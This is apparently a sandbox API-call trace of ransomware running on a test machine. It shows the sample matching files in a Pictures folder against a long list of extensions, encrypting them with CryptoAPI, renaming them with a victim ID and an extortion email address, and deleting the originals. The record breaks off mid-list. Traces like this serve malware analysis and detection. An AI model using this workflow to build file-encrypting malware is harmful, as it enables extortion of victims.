	[0195.693] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\h-7UuNY_Qd0.bmp", cchLength=0x2e | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\h-7uuny_qd0.bmp") returned 0x2e
	[0195.693] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.693] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\h-7uuny_qd0.bmp", lpSrch="help_decrypt_your_files") returned 0x0
	[0195.693] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\h-7uuny_qd0.bmp" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\h-7uuny_qd0.bmp") returned="c:\\users\\rdhj0cnfevzx\\pictures\\h-7uuny_qd0.bmp"
	[0195.693] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\h-7uuny_qd0.bmp") returned 46
	[0195.693] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.693] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.694] StrStrW (lpFirst=".bmp", lpSrch=".") returned=".bmp"
	[0195.694] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.694] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".bmp") returned=".bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0195.694] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0195.694] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0195.694] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\h-7uuny_qd0.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\h-7uuny_qd0.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0195.698] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xc6b3, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0xc6b3, lpOverlapped=0x0) returned 1
	[0195.701] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.702] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb7f8) returned 1
	[0195.703] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.704] CryptCreateHash (in: hProv=0xfcb7f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0195.704] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.704] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0195.704] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.704] CryptDeriveKey (in: hProv=0xfcb7f8, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0195.704] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.704] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0xc6b3, dwBufLen=0xc6b3 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0xc6c0) returned 1
	[0195.705] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.706] RtlMoveMemory (in: Destination=0xfe9840, Source=0xfdd180, Length=0xc6b3 | out: Destination=0xfe9840) 
	[0195.706] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.706] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe9840*, pdwDataLen=0x18bc0c*=0xc6b3, dwBufLen=0xc6c0 | out: pbData=0xfe9840*, pdwDataLen=0x18bc0c*=0xc6c0) returned 1
	[0195.708] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.708] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0195.708] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.708] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0195.708] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.708] CryptReleaseContext (hProv=0xfcb7f8, dwFlags=0x0) returned 1
	[0195.709] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.709] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0195.709] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.709] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0195.710] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\h-7uuny_qd0.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 88
	[0195.711] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\h-7uuny_qd0.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\h-7uuny_qd0.bmp.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0195.711] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe9840*, nNumberOfBytesToWrite=0xc6c0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe9840*, lpNumberOfBytesWritten=0x18c068*=0xc6c0, lpOverlapped=0x0) returned 1
	[0195.717] CloseHandle (hObject=0x2c0) returned 1
	[0195.717] CloseHandle (hObject=0x384) returned 1
	[0195.718] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\h-7uuny_qd0.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\h-7uuny_qd0.bmp")) returned 1
	[0195.725] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\h-7uuny_qd0.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\h-7uuny_qd0.bmp")) returned 0
	[0195.725] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x891a8d32, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x891a8d32, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x891a8d32, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0195.725] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2="..") returned 1
	[0195.725] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2=".") returned 1
	[0195.725] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0195.725] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="HELP_DECRYPT_YOUR_FILES.HTML" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\HELP_DECRYPT_YOUR_FILES.HTML") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\HELP_DECRYPT_YOUR_FILES.HTML"
	[0195.725] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\HELP_DECRYPT_YOUR_FILES.HTML") returned 59
	[0195.726] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0195.726] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\HELP_DECRYPT_YOUR_FILES.HTML", cchLength=0x3b | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\help_decrypt_your_files.html") returned 0x3b
	[0195.726] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.726] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\help_decrypt_your_files.html", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.html"
	[0195.726] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8915c7e1, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8915c7e1, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x891a8d32, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0195.726] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2="..") returned 1
	[0195.726] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2=".") returned 1
	[0195.727] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0195.727] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="HELP_DECRYPT_YOUR_FILES.TXT" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\HELP_DECRYPT_YOUR_FILES.TXT") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\HELP_DECRYPT_YOUR_FILES.TXT"
	[0195.727] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\HELP_DECRYPT_YOUR_FILES.TXT") returned 58
	[0195.727] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0195.727] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\HELP_DECRYPT_YOUR_FILES.TXT", cchLength=0x3a | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\help_decrypt_your_files.txt") returned 0x3a
	[0195.727] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.727] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\help_decrypt_your_files.txt", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.txt"
	[0195.727] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9c06050, ftCreationTime.dwHighDateTime=0x1d972bb, ftLastAccessTime.dwLowDateTime=0xdf8cedc0, ftLastAccessTime.dwHighDateTime=0x1d9750d, ftLastWriteTime.dwLowDateTime=0xdf8cedc0, ftLastWriteTime.dwHighDateTime=0x1d9750d, nFileSizeHigh=0x0, nFileSizeLow=0x15992, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kpHEVwvU--mnrRObfp5D.gif", cAlternateFileName="KPHEVW~1.GIF")) returned 1
	[0195.727] lstrcmpW (lpString1="kpHEVwvU--mnrRObfp5D.gif", lpString2="..") returned 1
	[0195.728] lstrcmpW (lpString1="kpHEVwvU--mnrRObfp5D.gif", lpString2=".") returned 1
	[0195.728] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0195.728] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="kpHEVwvU--mnrRObfp5D.gif" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\kpHEVwvU--mnrRObfp5D.gif") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\kpHEVwvU--mnrRObfp5D.gif"
	[0195.728] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\kpHEVwvU--mnrRObfp5D.gif") returned 55
	[0195.728] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0195.728] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\kpHEVwvU--mnrRObfp5D.gif", cchLength=0x37 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\kphevwvu--mnrrobfp5d.gif") returned 0x37
	[0195.728] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.730] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\kphevwvu--mnrrobfp5d.gif", lpSrch="help_decrypt_your_files") returned 0x0
	[0195.730] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\kphevwvu--mnrrobfp5d.gif" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\kphevwvu--mnrrobfp5d.gif") returned="c:\\users\\rdhj0cnfevzx\\pictures\\kphevwvu--mnrrobfp5d.gif"
	[0195.730] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\kphevwvu--mnrrobfp5d.gif") returned 55
	[0195.731] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0195.731] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.731] StrStrW (lpFirst=".gif", lpSrch=".") returned=".gif"
	[0195.731] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0195.731] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4